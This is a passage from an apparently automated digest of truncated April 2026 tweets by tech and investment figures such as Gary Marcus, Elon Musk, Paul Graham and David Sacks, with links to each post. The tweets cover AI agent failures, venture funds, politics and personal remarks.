in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(20 条)\n\n**[2026-04-27T15:50:31+00:00]**\n> If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say…\n[原文链接](https://nitter.net/GaryMarcus/status/2048791912149295182#m)\n\n**[2026-04-27T15:33:34+00:00]**\n> R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n[原文链接](https://nitter.net/GaryMarcus/status/2048787646206677207#m)\n\n**[2026-04-27T15:31:37+00:00]**\n> This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.\n[原文链接](https://nitter.net/GaryMarcus/status/2048787157536653627#m)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://nitter.net/GaryMarcus/status/2048771044987777428#m)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://nitter.net/GaryMarcus/status/2048578055283880296#m)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048570082843082905#m)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://nitter.net/GaryMarcus/status/2048567837221089669#m)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://nitter.net/GaryMarcus/status/2048558998325166498#m)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://nitter.net/GaryMarcus/status/2048553390540734479#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(18 条)\n\n**[2026-04-27T15:15:09+00:00]**\n> If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n[原文链接](https://nitter.net/elonmusk/status/2048783014075777369#m)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://nitter.net/elonmusk/status/2048777628019032335#m)\n\n**[2026-04-27T12:40:59+00:00]**\n> RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet. • Up to 3 Starlink antennas on each A380 for massive …\n[原文链接](https://nitter.net/cb_doge/status/2048744214230712500#m)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://nitter.net/KatieMiller/status/2048727747954868342#m)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://nitter.net/jason_meister/status/2048720909809156378#m)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T15:48:07+00:00]**\n> If they’re willing to die to assassinate, imagine what they will do if they gain political power\n[原文链接](https://nitter.net/elonmusk/status/2048428921536868583#m)\n\n**[2026-04-26T15:42:09+00:00]**\n> RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed\n[原文链接](https://nitter.net/SpaceX/status/2048427420366324024#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n**[2026-04-26T05:24:02+00:00]**\n> Yeah\n[原文链接](https://nitter.net/elonmusk/status/2048271866914083172#m)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://nitter.net/paulg/status/2048370801833828507#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://nitter.net/paulg/status/2048024967996993760#m)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://nitter.net/garrytan/status/2048017824895909901#m)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://nitter.net/paulg/status/2048017345000415744#m)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://nitter.net/Ananyo/status/2047992864118894954#m)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://nitter.net/vaggelisdrak/status/2047957234664030380#m)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://nitter.net/paulg/status/2047944827887591681#m)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://nitter.net/paulg/status/2047942555254288757#m)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://nitter.net/paulg/status/2047941243234107691#m)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://nitter.net/unusual_whales/status/2047761493274571036#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://nitter.net/ankurnagpal/status/2046961436593713241#m)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-27T08:14:21+00:00]**\n> 😳\n[原文链接](https://nitter.net/pmarca/status/2048677114480873657#m)\n\n**[2026-04-27T08:07:29+00:00]**\n> cc @BrendanEich\n[原文链接](https://nitter.net/pmarca/status/2048675385119019444#m)\n\n**[2026-04-27T08:04:13+00:00]**\n> 👀\n[原文链接](https://nitter.net/pmarca/status/2048674564314685477#m)\n\n**[2026-04-27T08:01:44+00:00]**\n> But \"A Disservice To Those Who Are Watching\" is the name of this show!\n[原文链接](https://nitter.net/pmarca/status/2048673940072251670#m)\n\n**[2026-04-27T07:59:56+00:00]**\n> cc @elonmusk\n[原文链接](https://nitter.net/pmarca/status/2048673488383447437#m)\n\n**[2026-04-27T04:43:41+00:00]**\n> When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\n[原文链接](https://nitter.net/pmarca/status/2048624098398650608#m)\n\n**[2026-04-27T04:32:43+00:00]**\n> Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"\n[原文链接](https://nitter.net/pmarca/status/2048621340408844368#m)\n\n**[2026-04-27T04:29:26+00:00]**\n> Image\n[原文链接](https://nitter.net/pmarca/status/2048620511912194339#m)\n\n**[2026-04-27T04:10:44+00:00]**\n> The apps can rewrite the files. 👀\n[原文链接](https://nitter.net/pmarca/status/2048615807190769738#m)\n\n**[2026-04-27T04:07:00+00:00]**\n> Many such cases.\n[原文链接](https://nitter.net/pmarca/status/2048614869352714619#m)\n\n**[2026-04-27T04:06:10+00:00]**\n> 🇺🇸\n[原文链接](https://nitter.net/pmarca/status/2048614659595583651#m)\n\n**[2026-04-27T04:04:46+00:00]**\n> Many such cases (in the universe).\n[原文链接](https://nitter.net/pmarca/status/2048614305705386433#m)\n\n**[2026-04-27T03:56:11+00:00]**\n> Concerning.\n[原文链接](https://nitter.net/pmarca/status/2048612144871264609#m)\n\n**[2026-04-27T03:49:14+00:00]**\n> Self recommending!\n[原文链接](https://nitter.net/pmarca/status/2048610397243265189#m)\n\n**[2026-04-27T03:01:18+00:00]**\n> Self recommending recommending.\n[原文链接](https://nitter.net/pmarca/status/2048598334492033455#m)\n\n**[2026-04-27T02:57:11+00:00]**\n> 👀\n[原文链接](https://nitter.net/pmarca/status/2048597298150875169#m)\n\n**[2026-04-27T02:34:50+00:00]**\n> 👀\n[原文链接](https://nitter.net/pmarca/status/2048591674688037210#m)\n\n**[2026-04-27T02:25:08+00:00]**\n> Overheard in Silicon Valley: \"Did a Claw post this?\"\n[原文链接](https://nitter.net/pmarca/status/2048589233095643240#m)\n\n**[2026-04-27T01:20:46+00:00]**\n> Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"\n[原文链接](https://nitter.net/pmarca/status/2048573035616375134#m)\n\n**[2026-04-26T21:32:43+00:00]**\n> Many such cases.\n[原文链接](https://nitter.net/pmarca/status/2048515643268567431#m)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(2 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://nitter.net/morganhousel/status/2047013991046881663#m)\n\n**[2026-04-21T03:24:00+00:00]**\n> RT by @morganhousel: I’m in love with this sentence: “The best math you can learn is how to calculate the future cost of current decisions.”\n[原文链接](https://nitter.net/readswithravi/status/2046429717834654025#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://nitter.net/eladgil/status/2046674350993223784#m)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://nitter.net/eladgil/status/2046640542218604783#m)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://nitter.net/eladgil/status/2046375878368940239#m)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://nitter.net/eladgil/status/2046300649483374704#m)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://nitter.net/eladgil/status/2046284381439103043#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://nitter.net/eladgil/status/2046284194943500453#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://nitter.net/eladgil/status/2046284191885922498#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://nitter.net/eladgil/status/2046284190132609299#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://nitter.net/eladgil/status/2046284188622737554#m)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://nitter.net/eladgil/status/2046284184877187540#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://nitter.net/theallinpod/status/2047808256047821141#m)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://nitter.net/DavidSacks/status/2047717649849659586#m)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://nitter.net/SquawkCNBC/status/2047703023690924289#m)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://nitter.net/RapidResponse47/status/2047694657107165519#m)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://nitter.net/DavidSacks/status/2047672359377588241#m)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://nitter.net/DavidSacks/status/2047671706660073767#m)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://nitter.net/DavidSacks/status/2047104229773279572#m)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://nitter.net/DavidSacks/status/2047103978979119580#m)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://nitter.net/Geiger_Capital/status/2046632586735243420#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764743205134644#m)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764741435179442#m)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing 